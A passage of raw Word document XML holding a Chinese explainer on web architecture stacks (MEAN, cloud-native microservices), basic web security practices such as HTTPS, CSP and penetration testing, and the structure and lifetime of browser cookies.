        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CDF1A1E" wp14:editId="35F9B9E1">
            <wp:extent cx="5615940" cy="18288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87BA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组件作用：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE8F125" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MongoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JSON</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2277D49C" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Express</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Node.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后端框架</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A24390A" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Angular</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：前端框架</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAD22B5" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Node.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行时</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1926B6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 xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>云原生架构（微服务方案）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EEED5B" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="485CC36E" wp14:editId="29C232DF">
            <wp:extent cx="5615940" cy="415544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A2B6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核心组件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B2F443" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Docker/K8s</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：容器化与编排</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41518781" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Service Mesh</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：服务通信治理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC83F8B" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ELK</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：日志监控系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703AB5F9" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>拓展</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176402AD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安全最佳实践：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C76C01" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所有传输启用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Let's Encrypt</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>免费证书）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6787554D" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实施</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSP(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内容安全策略</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防止</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE05D63" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定期进行渗透测试（工具：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OWASP ZAP/Burp Suite</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336B86D1" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>遵循最小权限原则部署服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1FD053" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>网站</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>的作用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4287D62C" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>的本质与工作原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70301D8A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 xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>什么是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EA22E2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定义：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是网站存储在用户浏览器中的小型文本文件（通常</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>≤</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4KB</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），用于记录用户状态信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3148F35F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核心特性：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AD50FD" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键值对存储：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">name=value </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> session_id=abc123</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5208D835" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域名绑定：仅对创建它的域名可见（同源策略）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385B46C4" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时效控制：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B69B0E" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="480" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：浏览器关闭即删除</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1867375D" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="480" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>持久</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Expires </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Max-Age </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置有效期</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC3A501" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自动携带：浏览器在每次请求中自动附加匹配的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9DF65F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b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. Cookie </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>的组成结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0180A4" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>STYLEREF 1 \s</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve">SEQ </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>表</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC \s 1</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的组成结构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88"/>
        <w:gridCol w:w="3844"/>
        <w:gridCol w:w="3212"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="4B9E7AB0" w14:textId="77777777" w:rsidTr="00501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DB0DD28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属性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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212F9B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作用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="181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52C329D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示例值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="5AEE17DE" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1011" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="19D5A0FC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rFonts w:cs="Times New Roman"/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cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Name/Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2173" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
